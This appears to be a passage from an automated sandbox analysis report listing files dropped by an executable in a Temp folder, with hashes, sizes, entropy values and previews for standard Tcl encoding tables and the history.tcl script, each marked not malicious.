                                                                                                                                                                                                                                                    SHA1:F585C70A5589DE39558DAC016743FF85E0C5F032
                                                                                                                                                                                                                                                    SHA-256:1CDCF510C38464E5284EDCFAEC334E3FC516236C1CA3B9AB91CA878C23866914
                                                                                                                                                                                                                                                    SHA-512:E620657C5F521A101B6FF7B5FD9A7F0DDD560166BA109D20E91F2E828F81697F897DFA136533C0D6F24A9861E92F34C0CC0FA590F344713C089157F8AC3ECFE2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: iso8859-9, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1092
                                                                                                                                                                                                                                                    Entropy (8bit):3.1984111069807395
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:zBTUmJvRju3ShVbsZiAMiZyb7PN8pUPnfk5JM0RHFj:zBgmOEVIwAMiw/PNPQPFj
                                                                                                                                                                                                                                                    MD5:0DCB64ACBB4B518CC20F4E196E04692C
                                                                                                                                                                                                                                                    SHA1:7AEB708C89C178FB4D5611C245EA1A7CF66ADF3A
                                                                                                                                                                                                                                                    SHA-256:480F61D0E1A75DEE59BF9A66DE0BB78FAAE4E87FD6317F93480412123277D442
                                                                                                                                                                                                                                                    SHA-512:4AFA210763DE9742626886D7D281AC15169CDC7A31D185F48D105190CA247AA014FB8F281AFCB4A0C31D2D55EE7D907B6A8E51FC4BEEDB9DB8C484E88CAA78A9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: jis0201, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):80453
                                                                                                                                                                                                                                                    Entropy (8bit):2.274731552146978
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:R7Cyeug/RAEo7umlshyGYknyRXglMVw9bq7bYI45zh2cvA3FXwhZ1BrUc2C5oS5u:RgZJo7uNhbyO1ZiEXPcXwhZbrUPkBso2
                                                                                                                                                                                                                                                    MD5:F35938AC582E460A14646D2C93F1A725
                                                                                                                                                                                                                                                    SHA1:A922ACACE0C1A4A7DDC92FE5DD7A116D30A3686B
                                                                                                                                                                                                                                                    SHA-256:118EA160EF29E11B46DEC57AF2C44405934DD8A7C49D2BC8B90C94E8BAA6138B
                                                                                                                                                                                                                                                    SHA-512:D27CD9C9D67370C288036AACA5999314231F7070152FF7EEF1F3379E748EF9047001430D391B61C281FF69AB4F709D47F8FF5390873B5DEFD105371AB8FB8872
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: jis0208, double-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):70974
                                                                                                                                                                                                                                                    Entropy (8bit):2.2631380488363284
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:WmU4+qNPpEzjKgGWJACVeCssX2Qt5E2+G7PBIv:LU4+qNaCgGW7VGK2o+0qv
                                                                                                                                                                                                                                                    MD5:F518436AC485F5DC723518D7872038E0
                                                                                                                                                                                                                                                    SHA1:15013478760463A0BCE3577B4D646ECDB07632B5
                                                                                                                                                                                                                                                    SHA-256:24A9D379FDA39F2BCC0580CA3E0BD2E99AE279AF5E2841C9E7DBE7F931D19CC0
                                                                                                                                                                                                                                                    SHA-512:2325705D4772A10CD81082A035BEAC85E6C64C7CCFA5981955F0B85CAF9A95D8A0820092957822A05C2E8E773F2089035ED5E76BF3FAF19B0E7E6AED7B4214D8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: jis0212, double-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.463428231669408
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:KcJ5mTUmJvRju3ShVbsZiAMiZyb7PcSzm1XvRS3YcmchJQ3MAxSy:KmmgmOEVIwAMiw/Ptz8gBmRcAx5
                                                                                                                                                                                                                                                    MD5:E66D42CB71669CA0FFBCDC75F6292832
                                                                                                                                                                                                                                                    SHA1:366C137C02E069B1A93FBB5D64B9120EA6E9AD1F
                                                                                                                                                                                                                                                    SHA-256:7142B1120B993D6091197574090FE04BE3EA64FFC3AD5A167A4B5E0B42C9F062
                                                                                                                                                                                                                                                    SHA-512:6FBF7AF0302B4AA7EF925EFED7235E946EDA8B628AA204A8BBB0A3D1CB8C79DD37D9DD92A276AD14B55776FEBB3B55CF5881AC4013F95ED4E618E3B49771E8A5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: koi8-r, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.439504497428066
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:K+TUmJvRju3ShVbsZiAMiZyb7PcSzmn3gXDRS3YcmchJQ3MAxSy:K+gmOEVIwAMiw/Ptz0KgBmRcAx5
                                                                                                                                                                                                                                                    MD5:D722EFEA128BE671A8FDA45ED7ADC586
                                                                                                                                                                                                                                                    SHA1:DA9E67F64EC4F6A74C60CB650D5A12C4430DCFF7
                                                                                                                                                                                                                                                    SHA-256:BBB729B906F5FC3B7EE6694B208B206D19A9D4DC571E235B9C94DCDD4A323A2A
                                                                                                                                                                                                                                                    SHA-512:FDF183C1A0D9109E21F7EEBC5996318AEDED3F87319A980C4E96BFE1D43593BDB693D181744C5C7E391A849783E3594234060A9F76116DE56F9592EF95979E63
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: koi8-u, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):92877
                                                                                                                                                                                                                                                    Entropy (8bit):2.32911747373862
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:XtWS2ymX62EztZ1Oyxk1uGtQPUNg0q+6XVfEFh:XtWnzEn1HxRQQPV0Eeh
                                                                                                                                                                                                                                                    MD5:599CEA614F5C5D01CDFA433B184AA904
                                                                                                                                                                                                                                                    SHA1:C2FFA427457B4931E5A92326F251CD3D671059B0
                                                                                                                                                                                                                                                    SHA-256:0F8B530AD0DECBF8DD81DA8291B8B0F976C643B5A292DB84680B31ECFBE5D00A
                                                                                                                                                                                                                                                    SHA-512:43D24B719843A21E3E1EDDFC3607B1B198542306C2EC8D621188CD39BA913D23678D39D12D8370CC1CE12828661AF0A5F14AD2B2BF99F62387C5E3E365BA1E75
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: ksc5601, double-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1096
                                                                                                                                                                                                                                                    Entropy (8bit):3.3601842107710365
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8jTUmJvRju3ShVbsZiAMiZyb7P4ZVPJS82WcVDX1MPEd4RPMppJ8K:8jgmOEVIwAMiw/PsVoy24VMppiK
                                                                                                                                                                                                                                                    MD5:CADFBF5A4C7CAD984294284D643E9CA3
                                                                                                                                                                                                                                                    SHA1:16B51D017001688A32CB7B15DE6E7A49F28B76FD
                                                                                                                                                                                                                                                    SHA-256:8F3089F4B2CA47B7AC4CB78375B2BFAC01268113A7C67D020F8B5B7F2C25BBDA
                                                                                                                                                                                                                                                    SHA-512:3941ACA62CF59BF6857BA9C300B4236F18690DE1213BB7FCFA0EC87DCD71152849F1DEAFB470CA4BC2ACC2C0C13D7FD57661BFC053960ADD7570DE365AE7E63C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macCentEuro, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1096
                                                                                                                                                                                                                                                    Entropy (8bit):3.3293096097500965
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8ULyTUmJvRju3ShVbsZiAMiZyb7P4SNMdNxOZwl+KR8DklJyseQWkv:8ULygmOEVIwAMiw/P34+KR8DklEswm
                                                                                                                                                                                                                                                    MD5:F13D479550D4967A0BC76A60C89F1461
                                                                                                                                                                                                                                                    SHA1:63F44E818284384DE07AB0D8B0CD6F7EBFE09AB9
                                                                                                                                                                                                                                                    SHA-256:8D0B6A882B742C5CCE938241328606C111DDA0CB83334EBEDCDA17605F3641AE
                                                                                                                                                                                                                                                    SHA-512:80AB9DCAAC1A496FD2CA6BE9959FE2DE201F504D8A58D114F2FF5D1F6AAD507F052B87D29D3EBA69093C3D965CC4C113C9EA6DB8EEBB67BD620ADF860CA2CC35
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macCroatian, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1096
                                                                                                                                                                                                                                                    Entropy (8bit):3.3482225358368565
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8dTUmJvRju3ShVbsZiAMiZyb7P4GE+SAJlM9aDpiR/Pk956e3cmh:8dgmOEVIwAMiw/Pr5NY3k9nsmh
                                                                                                                                                                                                                                                    MD5:60FFC8E390A31157D8646AEAC54E58AE
                                                                                                                                                                                                                                                    SHA1:3DE17B2A5866272602FB8E9C54930A4CD1F3B06C
                                                                                                                                                                                                                                                    SHA-256:EB135A89519F2E004282DED21B11C3AF7CCB2320C9772F2DF7D1A4A1B674E491
                                                                                                                                                                                                                                                    SHA-512:3644429A9BD42ADC356E1BD6FCFABEE120E851348B538A4FE4903B72A533174D7448A6C2DA71219E4CD5D0443C0475417D54C8E113005DF2CA20C608DE5E3306
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macCyrillic, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1096
                                                                                                                                                                                                                                                    Entropy (8bit):3.8086748658227827
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:87JM0UmJvRjuyfqYCsUBOdXBCbtwHviANskNWkiXFtoE4OSFgHrBPkq:87KfmOEqYCs6CXRPiANHWkiXFt9XSMdf
                                                                                                                                                                                                                                                    MD5:EBD121A4E93488A48FC0A06ADE9FD158
                                                                                                                                                                                                                                                    SHA1:A40E6DB97D6DB2893A072B2275DC22E2A4D60737
                                                                                                                                                                                                                                                    SHA-256:8FBCC63CB289AFAAE15B438752C1746F413F3B79BA5845C2EF52BA1104F8BDA6
                                                                                                                                                                                                                                                    SHA-512:26879ABE4854908296F32B2BB97AEC1F693C56EC29A7DB9B63B2DA62282F2D2EDAE9D50738595D1530731DF5B1812719A74F50ADF521F80DD5067F3DF6A3517C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macDingbats, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1093
                                                                                                                                                                                                                                                    Entropy (8bit):3.4271472017271556
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8dOTUmJvRju3ShVbsZiAMiZyb7P4Hlb7BMM2aSYjsSkUEkp1FsOSUTime:8kgmOEVIwAMiw/Pg7K23s0x1FsOJTime
                                                                                                                                                                                                                                                    MD5:14AD68855168E3E741FE179888EA7482
                                                                                                                                                                                                                                                    SHA1:9C2AD53D69F5077853A05F0933330B5D6F88A51C
                                                                                                                                                                                                                                                    SHA-256:F7BFF98228DED981EC9A4D1D0DA62247A8D23F158926E3ACBEC3CCE379C998C2
                                                                                                                                                                                                                                                    SHA-512:FB13F32197D3582BC20EEA604A0B0FD7923AE541CCEB3AF1CDE36B0404B8DB6312FB5270B40CBC8BA4C91B9505B57FB357EB875E8AFB3DB76DFB498CE17851ED
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macGreek, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                                                                    Entropy (8bit):3.3292041026777457
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8KTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdjY4g4JysAWD:8KgmOEVIwAMiw/Pf2YRMFBEszD
                                                                                                                                                                                                                                                    MD5:6D52A84C06970CD3B2B7D8D1B4185CE6
                                                                                                                                                                                                                                                    SHA1:C434257D76A9FDF81CCCD8CC14242C8E3940FD89
                                                                                                                                                                                                                                                    SHA-256:633F5E3E75BF1590C94AB9CBF3538D0F0A7A319DB9016993908452D903D9C4FD
                                                                                                                                                                                                                                                    SHA-512:711F4DC86DD609823BF1BC5505DEE9FA3875A8AA7BCA31DC1B5277720C5ABE65B62E8A592FC55D99D1C7CA181FDDC2606551C43A9D12489B9FECFF152E9A3DCF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macIceland, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):48028
                                                                                                                                                                                                                                                    Entropy (8bit):3.3111639331656635
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:ehuW1PJnT9TO7RaQiPCLUKr7KBi9FrOLdtHJ:eZPV9KuqTxFGXp
                                                                                                                                                                                                                                                    MD5:105B49F855C77AE0D3DED6C7130F93C2
                                                                                                                                                                                                                                                    SHA1:BA187C52FAE9792DA5BFFBEAA781FD4E0716E0F6
                                                                                                                                                                                                                                                    SHA-256:2A6856298EC629A16BDD924711DFE3F3B1E3A882DDF04B7310785D83EC0D566C
                                                                                                                                                                                                                                                    SHA-512:5B5FBE69D3B67AF863759D92D4A68481EC2211FF84ED9F0B3BD6129857966DE32B42A42432C44B9246C9D0D9C4C546CD3C6D13FF49BD338192C24AD053C0602E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macJapan, multi-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1093
                                                                                                                                                                                                                                                    Entropy (8bit):3.3361385497578406
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8TTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdjBtRg4JysAWD:8TgmOEVIwAMiw/P32YRMTtRBEszD
                                                                                                                                                                                                                                                    MD5:30BECAE9EFD678B6FD1E08FB952A7DBE
                                                                                                                                                                                                                                                    SHA1:E4D8EA6A0E70BB793304CA21EB1337A7A2C26A31
                                                                                                                                                                                                                                                    SHA-256:68F22BAD30DAA81B215925416C1CC83360B3BB87EFC342058929731AC678FF37
                                                                                                                                                                                                                                                    SHA-512:E87105F7A5A983ACEAC55E93FA802C985B2B19F51CB3C222B4C13DDCF17C32D08DF323C829FB4CA33770B668485B7D14B7F6B0CF2287B0D76091DE2A675E88BD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macRoman, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                                                                    Entropy (8bit):3.342586490827578
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8tTUmJvRju3ShVbsZiAMiZyb7P4SNMVZSxOZFYRMdj/TAg4JysAWD:8tgmOEVIwAMiw/P3AtYRMFTABEszD
                                                                                                                                                                                                                                                    MD5:C9AD5E42DA1D2C872223A14CC76F1D2B
                                                                                                                                                                                                                                                    SHA1:E257BD16EF34FDC29D5B6C985A1B45801937354C
                                                                                                                                                                                                                                                    SHA-256:71AE80ADFB437B7BC88F3C76FD37074449B3526E7AA5776D2B9FD5A43C066FA8
                                                                                                                                                                                                                                                    SHA-512:74588523D35A562AD4B1AF2B570596194D8C5018D5B44C8BA2B1F6BAD422D06E90172B0E65BB975663F3A3C246BCF2F598E9778BA86D1C5A51F5C0A38A2670EC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macRomania, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1092
                                                                                                                                                                                                                                                    Entropy (8bit):3.539905812302991
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:88TUmJvRju3ShVbsZiAMiZyb7P4oJi8XPHmED43U/Tmh:88gmOEVIwAMiw/PNJpP43U0
                                                                                                                                                                                                                                                    MD5:163729C7C2B1F5A5DE1FB7866C93B102
                                                                                                                                                                                                                                                    SHA1:633D190B5E281CFC0178F6C11DD721C6A266F643
                                                                                                                                                                                                                                                    SHA-256:CEAD5EB2B0B44EF4003FBCB2E49CA0503992BA1D6540D11ACBBB84FDBBD6E79A
                                                                                                                                                                                                                                                    SHA-512:2093E3B59622E61F29276886911FAA50BA3AA9D903CAF8CB778A1D3FDB3D1F7DA43071AFC3672C27BE175E7EEBBC542B655A85533F41EA39F32E80663CAF3B44
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macThai, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                                                                    Entropy (8bit):3.353168947106635
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8QjTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdD/g4JysD:88gmOEVIwAMiw/P32YRM9BEsD
                                                                                                                                                                                                                                                    MD5:F20CBBE1FF9289AC4CBAFA136A9D3FF1
                                                                                                                                                                                                                                                    SHA1:382E34824AD8B79EF0C98FD516750649FD94B20A
                                                                                                                                                                                                                                                    SHA-256:F703B7F74CC6F5FAA959F51C757C94623677E27013BCAE23BEFBA01A392646D9
                                                                                                                                                                                                                                                    SHA-512:23733B711614EA99D954E92C6035DAC1237866107FE11CDD5B0CD2A780F22B9B7B879570DB38C6B9195F54DAD9DFB0D60641AB37DFF3C51CF1A11D1D36471B2D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macTurkish, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                                                                    Entropy (8bit):3.3460856516901947
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8TzTUmJvRju3ShVbsZiAMiZyb7P4GE+SAJlM9aDpiR/Pk956e3cmq:8PgmOEVIwAMiw/Pr5NY3k9nsmq
                                                                                                                                                                                                                                                    MD5:92716A59D631BA3A352DE0872A5CF351
                                                                                                                                                                                                                                                    SHA1:A487946CB2EFD75FD748503D75E495720B53E5BC
                                                                                                                                                                                                                                                    SHA-256:4C94E7FBE183379805056D960AB624D78879E43278262E4D6B98AB78E5FEFEA8
                                                                                                                                                                                                                                                    SHA-512:863A667B6404ED02FE994089320EB0ECC34DC431D591D661277FB54A2055334DBEBCAAE1CA06FB8D190727EBA23A47B47991323BE35E74C182F83E5DEAA0D83B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                     Preview:# Encoding file: macUkraine, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):41862
                                                                                                                                                                                                                                                    Entropy (8bit):3.4936148161949747
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:/huW1PJnT9TOZRaQiPCLUKr7KBi9FrOLdtY:/ZPV9KoqTxFGXY
                                                                                                                                                                                                                                                    MD5:8FBCB1BBC4B59D6854A8FCBF25853E0D
                                                                                                                                                                                                                                                    SHA1:2D56965B24125D999D1020C7C347B813A972647C
                                                                                                                                                                                                                                                    SHA-256:7502587D52E7810228F2ECB45AC4319EA0F5C008B7AC91053B920010DC6DDF94
                                                                                                                                                                                                                                                    SHA-512:128E66F384F9EA8F3E7FBEAD0D3AA1D45570EB3669172269A89AE3B522ED44E4572C6A5C9281B7E219579041D14FF0E76777A36E3902BFA1B58DC3DA729FA075
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                     Preview:# Encoding file: shiftjis, multi-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.675943323650254
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:Sd0UmJvRjuLoVoMQVoRmSdsTAsSnP9Us+yw4VivXObCXv:afmOEVoMQVoRmosTHSP9U/ydmXwCXv
                                                                                                                                                                                                                                                    MD5:1B612907F31C11858983AF8C009976D6
                                                                                                                                                                                                                                                    SHA1:F0C014B6D67FC0DC1D1BBC5F052F0C8B1C63D8BF
                                                                                                                                                                                                                                                    SHA-256:73FD2B5E14309D8C036D334F137B9EDF1F7B32DBD45491CF93184818582D0671
                                                                                                                                                                                                                                                    SHA-512:82D4A8F9C63F50E5D77DAD979D3A59729CD2A504E7159AE3A908B7D66DC02090DABD79B6A6DC7B998C32C383F804AACABC564A5617085E02204ADF0B13B13E5B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                     Preview:# Encoding file: symbol, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):2.9763240350841884
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:ZlTUmJvRju3ShVbsZiAMiZyb7PNHmED43U/TW5dF:PgmOEVIwAMiw/PJ43UKF
                                                                                                                                                                                                                                                    MD5:7273E998972C9EFB2CEB2D5CD553DE49
                                                                                                                                                                                                                                                    SHA1:4AA47E6DF964366FA3C29A0313C0DAE0FA63A78F
                                                                                                                                                                                                                                                    SHA-256:330517F72738834ECBF4B6FA579F725B4B33AD9F4669975E727B40DF185751FF
                                                                                                                                                                                                                                                    SHA-512:56BF15C123083D3F04FE0C506EE8ECE4C08C17754F0CAAD3566F1469728CFD2F0A487023DCB26432240EB09F064944D3EF08175979F5D1D2BF734E7C7C609055
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                     Preview:# Encoding file: tis-620, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8965
                                                                                                                                                                                                                                                    Entropy (8bit):4.797372265665968
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:D/LSKxptMOtJt+tztUtputBtKtPpkyCqXLo9f6Jy3MN6QNiLtHQYTba3QYQYxlWl:DFxptHXQ9K7u7MZnCYq
                                                                                                                                                                                                                                                    MD5:2C3BBE593E10F8B25A1AE7753AC60C3A
                                                                                                                                                                                                                                                    SHA1:4D5A635C327FA29E9DDF9E6A2A44081C8DB8AA5A
                                                                                                                                                                                                                                                    SHA-256:F136E0DB9E71468E4D9D93200CD2D04E6915D5546681BFECA6CB9A620BA648BA
                                                                                                                                                                                                                                                    SHA-512:82B83610D273FAF980FF7BEEDD5BEE5C17FFED11A5F9B146135764ED2B86D57B98D3AEC50D2C9E7C72DA7C8CBC0329A712828D2ACEC27CC6C461924942C9B859
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# history.tcl --.#.# Implementation of the history command..#.# Copyright (c) 1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# The tcl::history array holds the history list and.# some additional bookkeeping variables..#.# nextid.the index used for the next history list item..# keep..the max size of the history list.# oldest.the index of the oldest item in the history...namespace eval tcl {. variable history. if {![info exists history]} {..array set history {.. nextid.0.. keep.20.. oldest.-20..}. }.}..# history --.#.#.This is the main history command. See the man page for its interface..#.This does argument checking and calls helper procedures in the.#.history namespace...proc history {args} {. set len [llength $args]. if {$len == 0} {..return [tcl::HistInfo]. }. set key [lindex $args 0]. set options "add, change, clear, event, info, keep
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9693
                                                                                                                                                                                                                                                    Entropy (8bit):4.753694945075162
                                                                                                                                                                                                                                                    Encrypted:false
